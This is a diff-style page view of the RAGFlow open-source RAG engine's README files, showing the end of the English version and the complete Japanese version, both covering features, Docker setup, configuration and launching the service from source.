- 2024-09-09 Adds a medical consultant agent template.
|
71 |
+
- 2024-08-22 Supports text-to-SQL statements through RAG.
|
72 |
+
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
|
73 |
+
- 2024-07-23 Supports audio file parsing.
|
74 |
+
- 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
|
75 |
+
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files, extracting tables from Markdown files.
|
76 |
+
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
|
77 |
+
|
78 |
+
|
79 |
+
## 🌟 Key Features
|
80 |
+
|
81 |
+
### 🍭 **"Quality in, quality out"**
|
82 |
+
|
83 |
+
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
|
84 |
+
- Finds "needle in a data haystack" of literally unlimited tokens.
|
85 |
+
|
86 |
+
### 🍱 **Template-based chunking**
|
87 |
+
|
88 |
+
- Intelligent and explainable.
|
89 |
+
- Plenty of template options to choose from.
|
90 |
+
|
91 |
+
### 🌱 **Grounded citations with reduced hallucinations**
|
92 |
+
|
93 |
+
- Visualization of text chunking to allow human intervention.
|
94 |
+
- Quick view of the key references and traceable citations to support grounded answers.
|
95 |
+
|
96 |
+
### 🍔 **Compatibility with heterogeneous data sources**
|
97 |
+
|
98 |
+
- Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.
|
99 |
+
|
100 |
+
### 🛀 **Automated and effortless RAG workflow**
|
101 |
+
|
102 |
+
- Streamlined RAG orchestration catered to both personal and large businesses.
|
103 |
+
- Configurable LLMs as well as embedding models.
|
104 |
+
- Multiple recall paired with fused re-ranking.
|
105 |
+
- Intuitive APIs for seamless integration with business.
|
106 |
+
|
107 |
+
## 🔎 System Architecture
|
108 |
+
|
109 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
110 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
111 |
+
</div>
|
112 |
+
|
113 |
+
## 🎬 Get Started
|
114 |
+
|
115 |
+
### 📝 Prerequisites
|
116 |
+
|
117 |
+
- CPU >= 4 cores
|
118 |
+
- RAM >= 16 GB
|
119 |
+
- Disk >= 50 GB
|
120 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
121 |
+
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
122 |
+
|
123 |
+
### 🚀 Start up the server
|
124 |
+
|
125 |
+
1. Ensure `vm.max_map_count` >= 262144:
|
126 |
+
|
127 |
+
> To check the value of `vm.max_map_count`:
|
128 |
+
>
|
129 |
+
> ```bash
|
130 |
+
> $ sysctl vm.max_map_count
|
131 |
+
> ```
|
132 |
+
>
|
133 |
+
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
134 |
+
>
|
135 |
+
> ```bash
|
136 |
+
> # In this case, we set it to 262144:
|
137 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
138 |
+
> ```
|
139 |
+
>
|
140 |
+
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
141 |
+
>
|
142 |
+
> ```bash
|
143 |
+
> vm.max_map_count=262144
|
144 |
+
> ```
|
145 |
+
|
146 |
+
2. Clone the repo:
|
147 |
+
|
148 |
+
```bash
|
149 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
150 |
+
```
|
151 |
+
|
152 |
+
3. Pull the pre-built Docker images and start up the server:
|
153 |
+
|
154 |
+
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.
|
155 |
+
|
156 |
+
```bash
|
157 |
+
$ cd ragflow/docker
|
158 |
+
$ chmod +x ./entrypoint.sh
|
159 |
+
$ docker compose up -d
|
160 |
+
```
|
161 |
+
|
162 |
+
|
163 |
+
> The core image is about 9 GB in size and may take a while to load.
|
164 |
+
|
165 |
+
4. Check the server status after having the server up and running:
|
166 |
+
|
167 |
+
```bash
|
168 |
+
$ docker logs -f ragflow-server
|
169 |
+
```
|
170 |
+
|
171 |
+
_The following output confirms a successful launch of the system:_
|
172 |
+
|
173 |
+
```bash
|
174 |
+
____ ______ __
|
175 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
176 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
177 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
178 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
179 |
+
/____/
|
180 |
+
|
181 |
+
* Running on all addresses (0.0.0.0)
|
182 |
+
* Running on http://127.0.0.1:9380
|
183 |
+
* Running on http://x.x.x.x:9380
|
184 |
+
INFO:werkzeug:Press CTRL+C to quit
|
185 |
+
```
|
186 |
+
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.
|
187 |
+
|
188 |
+
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
189 |
+
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
190 |
+
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
191 |
+
|
192 |
+
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
|
193 |
+
|
194 |
+
_The show is now on!_
|
195 |
+
|
196 |
+
## 🔧 Configurations
|
197 |
+
|
198 |
+
When it comes to system configurations, you will need to manage the following files:
|
199 |
+
|
200 |
+
- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
|
201 |
+
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
|
202 |
+
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
|
203 |
+
|
204 |
+
You must ensure that changes to the [.env](./docker/.env) file are consistent with the settings in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
205 |
+
|
206 |
+
> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
207 |
+
|
208 |
+
To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
|
209 |
+
|
210 |
+
> Updates to all system configurations require a system reboot to take effect:
|
211 |
+
>
|
212 |
+
> ```bash
|
213 |
+
> $ docker compose up -d
|
214 |
+
> ```
|
215 |
+
|
216 |
+
## 🛠️ Build from source
|
217 |
+
|
218 |
+
To build the Docker images from source:
|
219 |
+
|
220 |
+
```bash
|
221 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
222 |
+
$ cd ragflow/
|
223 |
+
$ docker build -t infiniflow/ragflow:dev .
|
224 |
+
$ cd docker
|
225 |
+
$ chmod +x ./entrypoint.sh
|
226 |
+
$ docker compose up -d
|
227 |
+
```
|
228 |
+
|
229 |
+
## 🛠️ Launch service from source
|
230 |
+
|
231 |
+
To launch the service from source:
|
232 |
+
|
233 |
+
1. Clone the repository:
|
234 |
+
|
235 |
+
```bash
|
236 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
237 |
+
$ cd ragflow/
|
238 |
+
```
|
239 |
+
|
240 |
+
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
|
241 |
+
|
242 |
+
```bash
|
243 |
+
$ conda create -n ragflow python=3.11.0
|
244 |
+
$ conda activate ragflow
|
245 |
+
$ pip install -r requirements.txt
|
246 |
+
```
|
247 |
+
|
248 |
+
```bash
|
249 |
+
# If your CUDA version is higher than 12.0, run the following additional commands:
|
250 |
+
$ pip uninstall -y onnxruntime-gpu
|
251 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
252 |
+
```
|
253 |
+
|
254 |
+
3. Copy the entry script and configure environment variables:
|
255 |
+
|
256 |
+
```bash
|
257 |
+
# Get the Python path:
|
258 |
+
$ which python
|
259 |
+
# Get the ragflow project path:
|
260 |
+
$ pwd
|
261 |
+
```
|
262 |
+
|
263 |
+
```bash
|
264 |
+
$ cp docker/entrypoint.sh .
|
265 |
+
$ vi entrypoint.sh
|
266 |
+
```
|
267 |
+
|
268 |
+
```bash
|
269 |
+
# Adjust configurations according to your actual situation (the following two export commands are newly added):
|
270 |
+
# - Assign the result of `which python` to `PY`.
|
271 |
+
# - Assign the result of `pwd` to `PYTHONPATH`.
|
272 |
+
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
|
273 |
+
# - Optional: Add Hugging Face mirror.
|
274 |
+
PY=${PY}
|
275 |
+
export PYTHONPATH=${PYTHONPATH}
|
276 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
277 |
+
```
|
278 |
+
|
279 |
+
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
|
280 |
+
|
281 |
+
```bash
|
282 |
+
$ cd docker
|
283 |
+
$ docker compose -f docker-compose-base.yml up -d
|
284 |
+
```
|
285 |
+
|
286 |
+
5. Check the configuration files, ensuring that:
|
287 |
+
|
288 |
+
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
|
289 |
+
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
|
290 |
+
|
291 |
+
6. Launch the RAGFlow backend service:
|
292 |
+
|
293 |
+
```bash
|
294 |
+
$ chmod +x ./entrypoint.sh
|
295 |
+
$ bash ./entrypoint.sh
|
296 |
+
```
|
297 |
+
|
298 |
+
7. Launch the frontend service:
|
299 |
+
|
300 |
+
```bash
|
301 |
+
$ cd web
|
302 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
303 |
+
$ vim .umirc.ts
|
304 |
+
# Update proxy.target to http://127.0.0.1:9380
|
305 |
+
$ npm run dev
|
306 |
+
```
|
307 |
+
|
308 |
+
8. Deploy the frontend service:
|
309 |
+
|
310 |
+
```bash
|
311 |
+
$ cd web
|
312 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
313 |
+
$ umi build
|
314 |
+
$ mkdir -p /ragflow/web
|
315 |
+
$ cp -r dist /ragflow/web
|
316 |
+
$ apt install nginx -y
|
317 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
318 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
319 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
320 |
+
$ systemctl start nginx
|
321 |
+
```
|
322 |
+
|
323 |
+
## 📚 Documentation
|
324 |
+
|
325 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
326 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
327 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
328 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
329 |
+
|
330 |
+
## 📜 Roadmap
|
331 |
+
|
332 |
+
See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
333 |
+
|
334 |
+
## 🏄 Community
|
335 |
+
|
336 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
337 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
338 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
339 |
+
|
340 |
+
## 🙌 Contributing
|
341 |
+
|
342 |
+
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
|
README_ja.md
ADDED
@@ -0,0 +1,289 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
|
22 |
+
alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
23 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
24 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
25 |
+
</a>
|
26 |
+
</p>
|
27 |
+
|
28 |
+
<h4 align="center">
|
29 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
30 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
31 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
32 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
33 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
34 |
+
</h4>
|
35 |
+
|
36 |
+
## 💡 RAGFlow とは?
|
37 |
+
|
38 |
+
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
39 |
+
|
40 |
+
## 🎮 Demo
|
41 |
+
|
42 |
+
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
|
43 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
44 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
45 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
46 |
+
</div>
|
47 |
+
|
48 |
+
|
49 |
+
## 🔥 最新情報
|
50 |
+
|
51 |
+
- 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
|
52 |
+
- 2024-09-09 エージェントに医療相談テンプレートを追加しました。
|
53 |
+
- 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
|
54 |
+
- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
|
55 |
+
- 2024-07-23 音声ファイルの解析をサポートしました。
|
56 |
+
- 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポート
|
57 |
+
- 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
|
58 |
+
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
|
59 |
+
|
60 |
+
|
61 |
+
## 🌟 主な特徴
|
62 |
+
|
63 |
+
### 🍭 **"Quality in, quality out"**
|
64 |
+
|
65 |
+
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
|
66 |
+
- 無限のトークンから"干し草の山の中の針"を見つける。
|
67 |
+
|
68 |
+
### 🍱 **テンプレートベースのチャンク化**
|
69 |
+
|
70 |
+
- 知的で解釈しやすい。
|
71 |
+
- テンプレートオプションが豊富。
|
72 |
+
|
73 |
+
### 🌱 **ハルシネーションが軽減された根拠のある引用**
|
74 |
+
|
75 |
+
- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
|
76 |
+
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
|
77 |
+
|
78 |
+
### 🍔 **多様なデータソースとの互換性**
|
79 |
+
|
80 |
+
- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
|
81 |
+
|
82 |
+
### 🛀 **自動化された楽な RAG ワークフロー**
|
83 |
+
|
84 |
+
- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
|
85 |
+
- カスタマイズ可能な LLM とエンベッディングモデル。
|
86 |
+
- 複数の想起と融合された再ランク付け。
|
87 |
+
- 直感的な API によってビジネスとの統合がシームレスに。
|
88 |
+
|
89 |
+
## 🔎 システム構成
|
90 |
+
|
91 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
92 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
93 |
+
</div>
|
94 |
+
|
95 |
+
## 🎬 初期設定
|
96 |
+
|
97 |
+
### 📝 必要条件
|
98 |
+
|
99 |
+
- CPU >= 4 cores
|
100 |
+
- RAM >= 16 GB
|
101 |
+
- Disk >= 50 GB
|
102 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
103 |
+
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
|
104 |
+
|
105 |
+
### 🚀 サーバーを起動
|
106 |
+
|
107 |
+
1. `vm.max_map_count` >= 262144 であることを確認する:
|
108 |
+
|
109 |
+
> `vm.max_map_count` の値をチェックするには:
|
110 |
+
>
|
111 |
+
> ```bash
|
112 |
+
> $ sysctl vm.max_map_count
|
113 |
+
> ```
|
114 |
+
>
|
115 |
+
> `vm.max_map_count` が 262144 以上の値でなければリセットする。
|
116 |
+
>
|
117 |
+
> ```bash
|
118 |
+
> # In this case, we set it to 262144:
|
119 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
120 |
+
> ```
|
121 |
+
>
|
122 |
+
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
|
123 |
+
>
|
124 |
+
> ```bash
|
125 |
+
> vm.max_map_count=262144
|
126 |
+
> ```
|
127 |
+
|
128 |
+
2. リポジトリをクローンする:
|
129 |
+
|
130 |
+
```bash
|
131 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
132 |
+
```
|
133 |
+
|
134 |
+
3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
|
135 |
+
|
136 |
+
```bash
|
137 |
+
$ cd ragflow/docker
|
138 |
+
$ chmod +x ./entrypoint.sh
|
139 |
+
$ docker compose up -d
|
140 |
+
```
|
141 |
+
|
142 |
+
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.11.0として、上記のコマンドを実行してください。
|
143 |
+
|
144 |
+
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
145 |
+
|
146 |
+
4. サーバーを立ち上げた後、サーバーの状態を確認する:
|
147 |
+
|
148 |
+
```bash
|
149 |
+
$ docker logs -f ragflow-server
|
150 |
+
```
|
151 |
+
|
152 |
+
_以下の出力は、システムが正常に起動したことを確認するものです:_
|
153 |
+
|
154 |
+
```bash
|
155 |
+
____ ______ __
|
156 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
157 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
158 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
159 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
160 |
+
/____/
|
161 |
+
|
162 |
+
* Running on all addresses (0.0.0.0)
|
163 |
+
* Running on http://127.0.0.1:9380
|
164 |
+
* Running on http://x.x.x.x:9380
|
165 |
+
INFO:werkzeug:Press CTRL+C to quit
|
166 |
+
```
|
167 |
+
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
|
168 |
+
|
169 |
+
5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
|
170 |
+
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
171 |
+
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
172 |
+
|
173 |
+
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
|
174 |
+
|
175 |
+
_これで初期設定完了!ショーの開幕です!_
|
176 |
+
|
177 |
+
## 🔧 コンフィグ
|
178 |
+
|
179 |
+
システムコンフィグに関しては、以下のファイルを管理する必要がある:
|
180 |
+
|
181 |
+
- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
|
182 |
+
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
|
183 |
+
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
|
184 |
+
|
185 |
+
[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
|
186 |
+
|
187 |
+
> [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
|
188 |
+
|
189 |
+
デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
|
190 |
+
|
191 |
+
> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
|
192 |
+
>
|
193 |
+
> ```bash
|
194 |
+
> $ docker compose up -d
|
195 |
+
> ```
|
196 |
+
|
197 |
+
## 🛠️ ソースからビルドする
|
198 |
+
|
199 |
+
ソースからDockerイメージをビルドするには:
|
200 |
+
|
201 |
+
```bash
|
202 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
203 |
+
$ cd ragflow/
|
204 |
+
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
205 |
+
$ cd docker
|
206 |
+
$ chmod +x ./entrypoint.sh
|
207 |
+
$ docker compose up -d
|
208 |
+
```
|
209 |
+
|
210 |
+
## 🛠️ ソースコードからサービスを起動する方法
|
211 |
+
|
212 |
+
ソースコードからサービスを起動する場合は、以下の手順に従ってください:
|
213 |
+
|
214 |
+
1. リポジトリをクローンします
|
215 |
+
```bash
|
216 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
217 |
+
$ cd ragflow/
|
218 |
+
```
|
219 |
+
|
220 |
+
2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
|
221 |
+
```bash
|
222 |
+
$ conda create -n ragflow python=3.11.0
|
223 |
+
$ conda activate ragflow
|
224 |
+
$ pip install -r requirements.txt
|
225 |
+
```
|
226 |
+
CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
|
227 |
+
```bash
|
228 |
+
$ pip uninstall -y onnxruntime-gpu
|
229 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
230 |
+
```
|
231 |
+
|
232 |
+
3. エントリースクリプトをコピーし、環境変数を設定します
|
233 |
+
```bash
|
234 |
+
$ cp docker/entrypoint.sh .
|
235 |
+
$ vi entrypoint.sh
|
236 |
+
```
|
237 |
+
以下のコマンドで Python のパスとragflowプロジェクトのパスを取得します:
|
238 |
+
```bash
|
239 |
+
$ which python
|
240 |
+
$ pwd
|
241 |
+
```
|
242 |
+
|
243 |
+
`which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。
|
244 |
+
|
245 |
+
`LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。
|
246 |
+
|
247 |
+
```bash
|
248 |
+
# 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
|
249 |
+
PY=${PY}
|
250 |
+
export PYTHONPATH=${PYTHONPATH}
|
251 |
+
# オプション:Hugging Face ミラーを追加
|
252 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
253 |
+
```
|
254 |
+
|
255 |
+
4. 基本サービスを起動します
|
256 |
+
```bash
|
257 |
+
$ cd docker
|
258 |
+
$ docker compose -f docker-compose-base.yml up -d
|
259 |
+
```
|
260 |
+
|
261 |
+
5. 設定ファイルを確認します
|
262 |
+
**docker/.env** 内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
|
263 |
+
|
264 |
+
6. サービスを起動します
|
265 |
+
```bash
|
266 |
+
$ chmod +x ./entrypoint.sh
|
267 |
+
$ bash ./entrypoint.sh
|
268 |
+
```
|
269 |
+
|
270 |
+
## 📚 ドキュメンテーション
|
271 |
+
|
272 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
273 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
274 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
275 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
276 |
+
|
277 |
+
## 📜 ロードマップ
|
278 |
+
|
279 |
+
[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
|
280 |
+
|
281 |
+
## 🏄 コミュニティ
|
282 |
+
|
283 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
284 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
285 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
286 |
+
|
287 |
+
## 🙌 コントリビュート
|
288 |
+
|
289 |
+
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
|
README_ko.md
ADDED
@@ -0,0 +1,325 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
